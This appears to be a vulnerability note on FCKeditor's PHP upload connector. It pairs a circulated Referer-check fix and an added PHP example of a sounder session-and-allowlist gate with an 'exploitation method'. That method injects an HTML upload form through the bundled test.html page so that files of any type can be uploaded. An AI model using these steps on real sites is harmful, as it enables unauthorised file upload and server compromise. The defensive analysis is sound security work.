Vulnerable file: editors/fckeditor/editor/filemanager/upload/php/upload.php
The fix circulated online is:
Fix: remove the FCK editor and use a different editor,
or locate the file editors/fckeditor/editor/filemanager/upload/php/upload.php
and, below
require('config.php');
require('util.php');
add the following code:
// Prevent submissions from outside the site
function outsidepost()
{
    $servername=$_SERVER['SERVER_NAME'];
    // Referer is sent by the client; @ suppresses the notice when it is absent
    $sub_from=@$_SERVER['HTTP_REFERER'];
    $sub_len=strlen($servername);
    // Skip the 7 characters of "http://" and take as many characters as the host name has
    $checkfrom=substr($sub_from,7,$sub_len);
    if($checkfrom!=$servername){
        echo("you don't outsidepost!");
        exit;
    }
}
outsidepost();
This prevents submissions from outside the site, but it does not prevent submissions from inside it.
Exploitation method:
1. Open editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
2. In the Current Folder box, enter
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
Then click Get Folders and Files; an upload form appears, through which files of any type can be uploaded.
PS: If the editors directory and the upload folder are configured to return 403, 500 or 404, the exploit no longer works.
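The point made above, that the Referer check cannot tell a same-site page from the editor itself, shown next to a gate that does not rely on the Referer. This is an added example, not FCKeditor code or part of the quoted fix; the function names, the `editor_user` session key and the extension allowlist are assumptions.

```php
<?php
// Added example, not FCKeditor code. Function names, the session key and the
// extension allowlist are assumptions made for illustration.

// The Referer comparison from the fix above, returning a boolean instead of exiting.
function referer_is_same_host(string $referer, string $serverName): bool
{
    return substr($referer, 7, strlen($serverName)) === $serverName;
}

// A gate that does not depend on which page rendered the form: the request
// must carry an authenticated session and an allowlisted file extension.
function upload_allowed(array $session, string $fileName, array $allowedExt): bool
{
    if (empty($session['editor_user'])) {            // assumed session key
        return false;
    }
    if (preg_match('#[/\\\\]#', $fileName)) {        // no path separators in the name
        return false;
    }
    $ext = strtolower(pathinfo($fileName, PATHINFO_EXTENSION));
    return $ext !== '' && in_array($ext, $allowedExt, true);
}

// Constructed sample requests (host taken from the form on this page).
$host     = 'www.url.com';
$testPage = "http://$host/editors/fckeditor/editor/filemanager/browser/default/connectors/test.html";
$allowed  = ['swf', 'mp3', 'avi'];                   // assumed allowlist for Type=Media
$cases = [
    'external page, no session'        => ['http://other.example/form.html', [], 'clip.avi'],
    'same-site page, no session'       => [$testPage, [], 'page.php'],
    'same-site page, logged in'        => [$testPage, ['editor_user' => 'alice'], 'page.php'],
    'same-site page, logged in, media' => [$testPage, ['editor_user' => 'alice'], 'clip.avi'],
];

foreach ($cases as $label => [$referer, $session, $file]) {
    printf("%-34s referer check: %-5s  session + allowlist: %s\n",
        $label,
        referer_is_same_host($referer, $host) ? 'pass' : 'block',
        upload_allowed($session, $file, $allowed) ? 'pass' : 'block');
}
```

The Referer check passes all three same-site requests; the session and allowlist gate passes only the last one.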